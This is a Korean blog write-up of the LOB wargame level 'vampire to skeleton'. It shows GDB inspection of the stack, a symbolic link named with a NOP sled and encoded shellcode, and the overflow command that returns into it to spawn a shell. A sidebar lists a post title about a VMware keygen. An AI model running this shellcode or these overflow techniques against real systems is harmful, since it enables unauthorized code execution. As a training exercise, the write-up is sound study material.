일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 | 31 |
- 빅데이터
- kosis
- wolfman to darkelf
- lob 10번
- 범용레지스터 #레지스터 #어셈블리 #ASM #리버싱 #어셈블리어 #EAX #ESP
- lob 7번
- IS함수
- troll to
- 마크업 언어
- pythonexe
- mode함수
- argv
- argc
- pyinstaller
- 서니나타스
- 쉘코드
- lob
- anxi0
- 써니나타스 1번
- 자료개방포털
- 데이터형
- orge to troll
- kostat
- ultra argv hunter
- 포너블
- R언어
- lob 9번
- pythoncli
- 써니나타스
- 결측치
- Today
- Total
ANX1-Z3R0의 불안극복(不安克服)
011. vampire to skeleton | anxi0 본문
vampire을 땄다!
skeleton도 따보자.
울트라 알그브 헌터?
굉장히 위협적이게 생겼다.
argv영역을 초기화 시킨다.
와;; 큰일 났네 쉘코드 어따가 넣냐,
막막하다면, GDB로 까봐야지
<- mkdir tmp
<-cd tmp
<-cp ~/skeleton skeleton
<-gdb -q skeleton
<-set disassembly-flavor intel
<-disas main
엥.........별게 없는데....?
안돼겠다. esp부터 스트링으로 까보자
<- r `python -c 'print "\xbf"*48'`
<- x/1000s $esp
계속 내려봤는데...........
역시! 뭔가 여지를 줬구만
이름에 쉘코드 넣으면 되겠네~
원본 파일 이름 바꾸는 건 위험하니깐... 심볼릭 링크?
<- ln -sf skeleton `python -c 'print "\x90"*50 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "\x90"*50'`
(앞뒤로 nop을 넣어줘야 한다.)
그 다음 실행!
<- ./`python -c 'print "\x90"*50 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "\x90"*50'` `python -c 'print "\x90"*44 + "\x8d\xff\xff\xbf"'`
쉘 떠진다! exit하고 본 파일에다가 익스하자.
휘유 ㅜㅜㅜ 이거푸는데 쉘코드 때문에 3일동안 잡고 있었다 ㅜㅜ
교훈
1. 명령어를 잘 활용하자 (리눅스를 익혀놓자)
2. 걍 파일보고 답 안나오면 gdb로 까보자!
3. 쉘코드에 주의하자 ㅜㅜㅜ
'HACKING > [SYSTEM HACKING] LOB' 카테고리의 다른 글
VMware 15.5 pro keygen 설치 방법 (0) | 2020.07.11 |
---|---|
012. skeleton to golem | anxi0 (0) | 2019.04.03 |
010. troll to vampire | anxi0 (0) | 2019.02.19 |
009. orge to troll | anxi0 (0) | 2019.02.19 |
008. darkelf to orge | anxi0 (0) | 2019.02.18 |